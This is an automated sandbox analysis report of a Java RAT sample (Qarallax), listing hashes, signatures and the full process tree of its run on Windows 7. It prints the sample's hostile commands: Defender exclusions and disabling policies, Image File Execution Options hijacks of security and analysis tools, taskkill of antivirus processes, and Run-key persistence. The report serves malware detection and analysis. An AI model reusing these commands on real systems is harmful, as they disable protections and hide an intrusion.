Analysis
-
max time kernel
64s -
max time network
132s -
platform
windows7_x64 -
resource
win7 -
submitted
18-08-2020 11:14
Static task
static1
Behavioral task
behavioral1
Sample
QAOTATION.jar
Resource
win7
Behavioral task
behavioral2
Sample
QAOTATION.jar
Resource
win10v200722
General
-
Target
QAOTATION.jar
-
Size
399KB
-
MD5
8eca12b92226ec7ceb8193771450a074
-
SHA1
6a426efaa7d416665384c2901644227813ec1894
-
SHA256
f5a935fac6403d609baa306db915ab5da6e9ab91f3c02a08d031bd32a7cede5d
-
SHA512
3df544b9cee31c46a093e22972541634f729f029e8157d0020113884618674fc653cd5c62bea4c3ed58a02c1db7f7de1c6428dfe2eea0c615d19641375b19a55
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\cTKTdqaOey3791458140538141913.xml qarallax_dll -
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
java.exepid process 1124 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
java.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
Processes:
java.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Users\Admin\oWsdf\Desktop.ini java.exe File created C:\Users\Admin\oWsdf\Desktop.ini java.exe File opened for modification C:\Users\Admin\oWsdf\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\oWsdf\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
Processes:
java.exedescription ioc process File created C:\Windows\System32\XadFx java.exe File opened for modification C:\Windows\System32\XadFx java.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1976 taskkill.exe 1688 taskkill.exe 1552 taskkill.exe 1552 taskkill.exe 1608 taskkill.exe 1408 taskkill.exe 1608 taskkill.exe 1556 taskkill.exe 1796 taskkill.exe 1032 taskkill.exe 2040 taskkill.exe 2024 taskkill.exe 1168 taskkill.exe 1784 taskkill.exe 1796 taskkill.exe 2044 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1556 powershell.exe 1556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 596 WMIC.exe Token: SeSecurityPrivilege 596 WMIC.exe Token: SeTakeOwnershipPrivilege 596 WMIC.exe Token: SeLoadDriverPrivilege 596 WMIC.exe Token: SeSystemProfilePrivilege 596 WMIC.exe Token: SeSystemtimePrivilege 596 WMIC.exe Token: SeProfSingleProcessPrivilege 596 WMIC.exe Token: SeIncBasePriorityPrivilege 596 WMIC.exe Token: SeCreatePagefilePrivilege 596 WMIC.exe Token: SeBackupPrivilege 596 WMIC.exe Token: SeRestorePrivilege 596 WMIC.exe Token: SeShutdownPrivilege 596 WMIC.exe Token: SeDebugPrivilege 596 WMIC.exe Token: SeSystemEnvironmentPrivilege 596 WMIC.exe Token: SeRemoteShutdownPrivilege 596 WMIC.exe Token: SeUndockPrivilege 596 WMIC.exe Token: SeManageVolumePrivilege 596 WMIC.exe Token: 33 596 WMIC.exe Token: 34 596 WMIC.exe Token: 35 596 WMIC.exe Token: SeIncreaseQuotaPrivilege 596 WMIC.exe Token: SeSecurityPrivilege 596 WMIC.exe Token: SeTakeOwnershipPrivilege 596 WMIC.exe Token: SeLoadDriverPrivilege 596 WMIC.exe Token: SeSystemProfilePrivilege 596 WMIC.exe Token: SeSystemtimePrivilege 596 WMIC.exe Token: SeProfSingleProcessPrivilege 596 WMIC.exe Token: SeIncBasePriorityPrivilege 596 WMIC.exe Token: SeCreatePagefilePrivilege 596 WMIC.exe Token: SeBackupPrivilege 596 WMIC.exe Token: SeRestorePrivilege 596 WMIC.exe Token: SeShutdownPrivilege 596 WMIC.exe Token: SeDebugPrivilege 596 WMIC.exe Token: SeSystemEnvironmentPrivilege 596 WMIC.exe Token: SeRemoteShutdownPrivilege 596 WMIC.exe Token: SeUndockPrivilege 596 WMIC.exe Token: SeManageVolumePrivilege 596 WMIC.exe Token: 33 596 WMIC.exe Token: 34 596 WMIC.exe Token: 35 596 WMIC.exe Token: SeIncreaseQuotaPrivilege 1084 WMIC.exe Token: SeSecurityPrivilege 1084 WMIC.exe Token: SeTakeOwnershipPrivilege 1084 WMIC.exe Token: SeLoadDriverPrivilege 1084 WMIC.exe Token: SeSystemProfilePrivilege 1084 WMIC.exe Token: SeSystemtimePrivilege 1084 WMIC.exe Token: SeProfSingleProcessPrivilege 1084 WMIC.exe Token: SeIncBasePriorityPrivilege 1084 WMIC.exe Token: SeCreatePagefilePrivilege 1084 WMIC.exe Token: SeBackupPrivilege 1084 WMIC.exe Token: SeRestorePrivilege 1084 WMIC.exe Token: SeShutdownPrivilege 1084 WMIC.exe Token: SeDebugPrivilege 1084 WMIC.exe Token: SeSystemEnvironmentPrivilege 1084 WMIC.exe Token: SeRemoteShutdownPrivilege 1084 WMIC.exe Token: SeUndockPrivilege 1084 WMIC.exe Token: SeManageVolumePrivilege 1084 WMIC.exe Token: 33 1084 WMIC.exe Token: 34 1084 WMIC.exe Token: 35 1084 WMIC.exe Token: SeIncreaseQuotaPrivilege 1084 WMIC.exe Token: SeSecurityPrivilege 1084 WMIC.exe Token: SeTakeOwnershipPrivilege 1084 WMIC.exe Token: SeLoadDriverPrivilege 1084 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
java.exepid process 1124 java.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
java.execmd.execmd.execmd.exedescription pid process target process PID 1124 wrote to memory of 1620 1124 java.exe cmd.exe PID 1124 wrote to memory of 1620 1124 java.exe cmd.exe PID 1124 wrote to memory of 1620 1124 java.exe cmd.exe PID 1124 wrote to memory of 784 1124 java.exe cmd.exe PID 1124 wrote to memory of 784 1124 java.exe cmd.exe PID 1124 wrote to memory of 784 1124 java.exe cmd.exe PID 784 wrote to memory of 596 784 cmd.exe WMIC.exe PID 784 wrote to memory of 596 784 cmd.exe WMIC.exe PID 784 wrote to memory of 596 784 cmd.exe WMIC.exe PID 1124 wrote to memory of 1096 1124 java.exe cmd.exe PID 1124 wrote to memory of 1096 1124 java.exe cmd.exe PID 1124 wrote to memory of 1096 1124 java.exe cmd.exe PID 1096 wrote to memory of 1084 1096 cmd.exe WMIC.exe PID 1096 wrote to memory of 1084 1096 cmd.exe WMIC.exe PID 1096 wrote to memory of 1084 1096 cmd.exe WMIC.exe PID 1124 wrote to memory of 1400 1124 java.exe attrib.exe PID 1124 wrote to memory of 1400 1124 java.exe attrib.exe PID 1124 wrote to memory of 1400 1124 java.exe attrib.exe PID 1124 wrote to memory of 1804 1124 java.exe attrib.exe PID 1124 wrote to memory of 1804 1124 java.exe attrib.exe PID 1124 wrote to memory of 1804 1124 java.exe attrib.exe PID 1124 wrote to memory of 1844 1124 java.exe attrib.exe PID 1124 wrote to memory of 1844 1124 java.exe attrib.exe PID 1124 wrote to memory of 1844 1124 java.exe attrib.exe PID 1124 wrote to memory of 1840 1124 java.exe attrib.exe PID 1124 wrote to memory of 1840 1124 java.exe attrib.exe PID 1124 wrote to memory of 1840 1124 java.exe attrib.exe PID 1124 wrote to memory of 1224 1124 java.exe attrib.exe PID 1124 wrote to memory of 1224 1124 java.exe attrib.exe PID 1124 wrote to memory of 1224 1124 java.exe attrib.exe PID 1124 wrote to memory of 1788 1124 java.exe attrib.exe PID 1124 wrote to memory of 1788 1124 java.exe attrib.exe PID 1124 wrote to memory of 1788 1124 java.exe attrib.exe PID 1124 wrote to memory of 1776 1124 java.exe attrib.exe PID 1124 wrote to memory of 1776 1124 java.exe attrib.exe PID 1124 wrote to memory of 1776 1124 java.exe attrib.exe PID 1124 wrote to memory of 1768 1124 java.exe attrib.exe PID 1124 wrote to memory of 1768 1124 java.exe attrib.exe PID 1124 wrote to memory of 1768 1124 java.exe attrib.exe PID 1124 wrote to memory of 1652 1124 java.exe cmd.exe PID 1124 wrote to memory of 1652 1124 java.exe cmd.exe PID 1124 wrote to memory of 1652 1124 java.exe cmd.exe PID 1124 wrote to memory of 1552 1124 java.exe taskkill.exe PID 1124 wrote to memory of 1552 1124 java.exe taskkill.exe PID 1124 wrote to memory of 1552 1124 java.exe taskkill.exe PID 1124 wrote to memory of 1556 1124 java.exe powershell.exe PID 1124 wrote to memory of 1556 1124 java.exe powershell.exe PID 1124 wrote to memory of 1556 1124 java.exe powershell.exe PID 1124 wrote to memory of 1924 1124 java.exe reg.exe PID 1124 wrote to memory of 1924 1124 java.exe reg.exe PID 1124 wrote to memory of 1924 1124 java.exe reg.exe PID 1124 wrote to memory of 1912 1124 java.exe reg.exe PID 1124 wrote to memory of 1912 1124 java.exe reg.exe PID 1124 wrote to memory of 1912 1124 java.exe reg.exe PID 1124 wrote to memory of 1964 1124 java.exe reg.exe PID 1124 wrote to memory of 1964 1124 java.exe reg.exe PID 1124 wrote to memory of 1964 1124 java.exe reg.exe PID 1124 wrote to memory of 2004 1124 java.exe reg.exe PID 1124 wrote to memory of 2004 1124 java.exe reg.exe PID 1124 wrote to memory of 2004 1124 java.exe reg.exe PID 1652 wrote to memory of 1936 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1936 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1936 1652 cmd.exe reg.exe PID 1124 wrote to memory of 1996 1124 java.exe reg.exe -
Views/modifies file attributes 1 TTPs 8 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1788 attrib.exe 1776 attrib.exe 1768 attrib.exe 1400 attrib.exe 1804 attrib.exe 1844 attrib.exe 1840 attrib.exe 1224 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\QAOTATION.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1620
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1400
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1804
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\oWsdf\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1844
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\oWsdf\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1840
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:1224
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:1788
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:1776
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\oWsdf\MIJPw.class2⤵
- Views/modifies file attributes
PID:1768
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1936
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1108
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\oWsdf','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\oWsdf\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1556
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1924
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1912
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1964
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2004
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1996
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2024
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1072
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:764
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1056
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1524
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1868
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1112
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:296
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1800
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1704
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1848
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1780
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1640
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1976
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1956
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2020
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1612
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1916
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:388
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1568
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1488
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1784
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1956
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1072
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1936
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1808
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1116
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2020
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1912
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1520
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵PID:1536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1820
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1780
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1796
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1608
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1688
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1032
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1408
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1796
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1608
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2040
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2024
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2044
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1556
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1552
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:1168
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
e3a6fd5dad02f5d1dd406edf76f35821
SHA1205be9e1fcdf9a653715e6a60a5c5bc9258cb750
SHA256b1add98efbd625a3d9fec605c35a6f3bcb6018261106765197d16c4bcba2e409
SHA512d86c00a8959604a14eb2f2f375aa902ad665a79fba86884cf03ca3dd6d173f364e19e9dbbc263f59cae255197b0fe2edc12cdb68779fe1ba81dcc9b64c847b91
-
MD5
cee3ab492cb5e9f2154e9b995b96f221
SHA1d0c4b3ce375c4c970b23fec4afbd18183256f678
SHA25654b33fd7088005879be4096fdebbfbab9895572a6c1c8b83963696992885f635
SHA512390515a62c9cb2c75bd1c0105c6ef44137606e59bc229566eb4e5ba6943908bea213ba857ea3921fe1c62e123d5903a9e340dfb2dcc583b9aae29692a9ebb97a
-
MD5
8eca12b92226ec7ceb8193771450a074
SHA16a426efaa7d416665384c2901644227813ec1894
SHA256f5a935fac6403d609baa306db915ab5da6e9ab91f3c02a08d031bd32a7cede5d
SHA5123df544b9cee31c46a093e22972541634f729f029e8157d0020113884618674fc653cd5c62bea4c3ed58a02c1db7f7de1c6428dfe2eea0c615d19641375b19a55
-
MD5
ec637273bc8dba95b0b207ff3146ed9d
SHA15cba564fd731f6de8ac3d610d22c98b603dfee54
SHA256ad697691ab8cdb3437cd74107a44d943e95918971984449cee213e5b6db06356
SHA51258b0c5d075768daa251ea6481462a608e2f2999e6f76743940ba82e850f4e423e84d8eaac622f80de4f4f1f2244f938923e54abb17c1d522832bf39d02a550cf